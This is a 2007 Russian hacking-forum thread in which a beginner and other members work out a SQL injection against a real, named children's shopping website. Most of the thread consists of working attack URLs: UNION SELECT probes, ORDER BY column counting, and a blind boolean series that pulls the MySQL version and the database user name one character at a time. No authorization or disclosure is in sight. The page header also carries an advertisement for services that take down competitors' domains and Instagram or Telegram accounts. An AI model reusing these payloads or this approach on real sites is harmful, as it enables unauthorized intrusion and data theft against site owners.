странный SQL-injection

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
странный SQL-injection

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

странный SQL-injection

22.03.2007, 07:50

fastnull

Познающий

Регистрация: 05.03.2007

Сообщений: 31

С нами: 10097385

Репутация: 7

странный SQL-injection

Вообщем так, нашёл на сайте вроде бы явную sql-injection
при вставке кавычки возвращает
http://www.injection.com/?dept=62&pid=665'

You have an error in your SQL syntax near '\'' at line 1

Вставляю
http://www.injection.com/?dept=62&pid=-999+union+select+1/*
А отображается
You have an error in your SQL syntax near 'union select 1/*' at line 1

При проверке
http://www.injection.com/?dept=62&pid=666-1
Выдаёт страницу http://www.injection.com/?dept=62&pid=665
Что бы я не вводил, выводится запрос в тексте после +union
Что такое - не получается
Я только учусь и надёюсь на ваш ценный совет!

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось fastnull; 22.03.2007 в 07:59..

22.03.2007, 08:09

ice1k

Постоянный

Регистрация: 01.01.2007

Сообщений: 551

С нами: 10188326

Репутация: 1866

Полный линк на сайт в студию...

22.03.2007, 08:16

fastnull

Познающий

Регистрация: 05.03.2007

Сообщений: 31

С нами: 10097385

Репутация: 7

Цитата:

Сообщение от ice1k

Полный линк на сайт в студию...

Пожалуйста!

http://www.mykidsfair.com/?dept=62&pi=665

22.03.2007, 08:30

aka PSIH

Постоянный

Регистрация: 07.02.2006

Сообщений: 630

С нами: 10660753

Репутация: 676

ну тогда правильный линк
http://www.mykidsfair.com/?dept=62&pid=665

22.03.2007, 08:31

aka PSIH

Постоянный

Регистрация: 07.02.2006

Сообщений: 630

С нами: 10660753

Репутация: 676

вот это тоже интересно...
http://www.mykidsfair.com/?dept=xxx

22.03.2007, 08:46

fastnull

Познающий

Регистрация: 05.03.2007

Сообщений: 31

С нами: 10097385

Репутация: 7

Цитата:

Сообщение от aka PSIH

вот это тоже интересно...
http://www.mykidsfair.com/?dept=xxx

Круто! А я и не заметил, тогда сейчас попробую подобрать название колонки

А что можно поиметь вот с этого сообщения

http://www.mykidsfair.com/?dept=-999+union+select+1,2/*

You have an error in your SQL syntax near 'union select 1,2/* AND page_class = 4' at line 1
Что за параметр page_class = 4 ?

Последний раз редактировалось Koller; 22.03.2007 в 11:28..

22.03.2007, 09:28

_Pantera_

Участник форума

Регистрация: 06.10.2006

Сообщений: 226

С нами: 10313606

Репутация: 1327

http://www.mykidsfair.com/?dept=62+order+by+13--

на сайте стоит 3 версия мускула, это мы узнаем по 1 цифре след запроса
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(version (),1,1)))=51

а потом вытягиваем USER()
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 1,1)))=99
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 2,1)))=106
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 3,1)))=104
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 4,1)))=97
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 5,1)))=114
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 6,1)))=109
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 7,1)))=97
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 8,1)))=110
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 9,1)))=64
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 10,1)))=108

в итоге получаем char() кодировку имени юзера
99, 106, 104, 97, 114, 109, 97, 110, 64, 108(остановился на 108, так как по практике могу сказать что там идет localhost)

ps мазахисты могут еще повытягивать......